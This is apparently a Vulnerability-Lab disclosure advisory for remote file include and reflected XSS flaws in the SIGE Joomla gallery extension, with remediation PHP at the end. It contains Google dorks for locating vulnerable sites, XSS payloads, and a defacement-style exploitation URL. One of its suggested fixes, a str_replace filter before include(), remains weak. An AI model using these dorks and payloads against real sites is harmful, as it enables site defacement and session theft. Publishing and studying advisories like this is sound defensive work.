# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Version: 3.5.3

Document Title:
===============
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2265

Release Date:
=============
2020-11-11

Vulnerability Laboratory ID (VL-ID):
====================================
2265

Common Vulnerability Scoring System:
====================================
7.8

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
It offers numerous opportunities to present pictures quickly and easily in articles. The unique feature of the plugin is that you can control any parameter on the syntax call. Editor Button - SIGE Parameters: With the button, you can set the parameters very easily on-the-fly in an article. It is an excellent addition to SIGE. Highlights are: parameter call, watermark function, read IPTC data, thumbnail storage, crop function, sort by modification date, output as a list, CSS Image Tooltip, Editor Button SIGE Parameter and much more.

In version 1.7-2, SIGE was rewritten entirely and equipped with numerous innovations. The absolute highlight is the turbo mode. This feature doesn't exist in any other plugin for Joomla!. In Turbo Mode 2 text files are created from the HTML output of the gallery and loaded in successive runs. This feature eliminates the tedious editing process of each image. In a test with 50 large images, the creation of a gallery with all the extra features (save thumbnails, watermark generation, resize original images, etc.) without turbo mode lasted approximately 17 seconds. In turbo mode, it only took 1 second, and the gallery on the same scale was available! For calling the syntaxes, additionally, an Editor Button has been programmed. It makes it very easy to choose the required syntax, showing all the settings and parameters of the plugin. It is a great enrichment in using the SIGE plugin.

(Copy of the Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended )
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ; https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ; https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for Joomla.

Affected Product(s):
====================
Vendor:
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro - Joomla Extension (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-11-10: Researcher Notification & Coordination (Security Researcher)
2020-11-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Open Authentication (Anonymous Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
1.1
A file include vulnerability has been discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for Joomla. The web vulnerability allows remote attackers to upload web-shells or malicious content without authorization to compromise the local file system.

The vulnerability is located in the img parameter of the print.php file. Remote attackers are able to upload images to the unrestricted assets path to compromise the web application's file system and the involved database management system. Exploitation requires no user interaction and only a low-privileged user account to upload images.

1.2
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for Joomla. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser-to-web-application requests from the client side.

The non-persistent cross site scripting web vulnerabilities are located in the `name` and `title` parameters of the `print.php` file. Remote attackers without user or guest privileges are able to craft malicious links to compromise client-side GET method requests. The attack vector is non-persistent and the issue affects the client side.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent client-side manipulation of affected application modules.

Proof of Concept (PoC):
=======================
1.1
The remote file include web vulnerability can be exploited by remote attackers without a privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"

PoC: Exploitation
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI VULNERABILITY!]&name=[NAME]%20title=[TITLE]

1.2
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"

PoC: Payload
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>

PoC: Example
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT XSS]

PoC: Exploitation
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E

Solution - Fix & Patch:
=======================
1.1
The remote file include vulnerability can be resolved by the following steps ...

Example:

<?php
// Only files on this allow-list may be included; anything else is ignored.
$files = array('test.gif');
if (in_array($_GET['file'], $files)) {
    include($_GET['file']);
}
?>

* If you are a server administrator, turn off allow_url_fopen in the PHP configuration file.
* Or do it with the ini_set command. Only for (RFI)

<?php
// allow_url_fopen (like allow_url_include, which include() of a URL also needs)
// can only be set at system level in php.ini; ini_set() here does not change it
// at runtime, so the php.ini setting above is the one that counts.
ini_set('allow_url_fopen', 'Off');
?>

* We can use the strpos command to check that if the address starts with http:// the file will not be included

<?php
// strpos() returns 0 (falsy) when 'http://' is at the very start, so a plain
// `if (!$strpos)` would include exactly the URLs it is meant to block;
// compare against false instead.
$strpos = strpos($_GET['url'], 'http://');
if ($strpos === false) {
    include($_GET['url']);
}
?>

* Using str_replace we can clean the given address of the two characters "/" and "."

<?php
$url = $_GET['url'];
$url = str_replace("/", "", $url); // strip path separators
$url = str_replace(".", "", $url); // strip dots (no traversal, no host names)
include($url);
?>

1.2
The client-side cross site scripting vulnerabilities can be resolved by the following steps ...
1. Encode and escape the name and title parameters when they are parsed
2. Filter the input for special chars and disallow them in parameters

Security Risk:
==============
1.1
The security risk of the remote file include vulnerability in the img path of the web application request is estimated as high.

1.2
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as medium.

Credits & Authors:
==================
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
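The Solution section above gives the two remediations separately: restrict the `img` parameter to local files and escape `name`/`title` on output. The PHP below is an added example (not SIGE's own code) of a print.php-style handler that applies both; the image directory, the parameter names and the sample requests are assumptions for this example.

```php
<?php
// Added example, not SIGE code. The img parameter is resolved to an existing file
// below a fixed local image directory (no URLs, no traversal), and name/title are
// HTML-escaped so the advisory's "><svg onload=...> and '><script> payloads stay inert.

function resolve_local_image(string $img, string $base_dir): ?string
{
    // Reject anything with a scheme: http://, php://, data:, also C:\ style paths.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $img)) {
        return null;
    }
    // Reject empty input, absolute paths and embedded NUL bytes before touching the filesystem.
    if ($img === '' || $img[0] === '/' || $img[0] === '\\' || strpos($img, "\0") !== false) {
        return null;
    }
    $real_base = realpath($base_dir);
    $real_file = realpath($base_dir . DIRECTORY_SEPARATOR . $img);
    if ($real_base === false || $real_file === false) {
        return null; // base dir missing or file does not exist
    }
    // realpath() collapses "..", so a file outside the base directory shows up here.
    if (strpos($real_file, $real_base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Only serve image types, and never include() a user-chosen file.
    if (!is_file($real_file) || !preg_match('/\.(jpe?g|png|gif|webp)$/i', $real_file)) {
        return null;
    }
    return $real_file;
}

function escape_attr(string $s): string
{
    // ENT_QUOTES escapes both quote styles, so neither "> nor '> can close the attribute.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_print_page(array $get, string $base_dir): string
{
    $img = resolve_local_image($get['img'] ?? '', $base_dir);
    if ($img === null) {
        http_response_code(400);
        return '<p>Invalid image.</p>';
    }
    // Emit a web path built from the validated file name, not the filesystem path.
    $web_path = 'images/' . rawurlencode(basename($img));
    $name  = escape_attr($get['name'] ?? '');
    $title = escape_attr($get['title'] ?? '');
    return '<img src="' . $web_path . '" alt="' . $name . '" title="' . $title . '">';
}

// Constructed sample requests: a remote URL (the RFI case), a traversal path, and a
// valid local image with the advisory's XSS payload in name. Assumes ./images/photo.jpg exists.
$base = __DIR__ . '/images';
foreach ([
    ['img' => 'http://example.invalid/h4.gif', 'name' => 'x', 'title' => 'y'],
    ['img' => '../../etc/passwd', 'name' => 'x', 'title' => 'y'],
    ['img' => 'photo.jpg', 'name' => '"><svg onload=alert()>', 'title' => "'><script>alert('');</script>"],
] as $request) {
    echo render_print_page($request, $base), "\n";
}
```

Run from a directory containing images/photo.jpg: the first two requests return "Invalid image." and the third renders an img tag whose alt and title contain only escaped text.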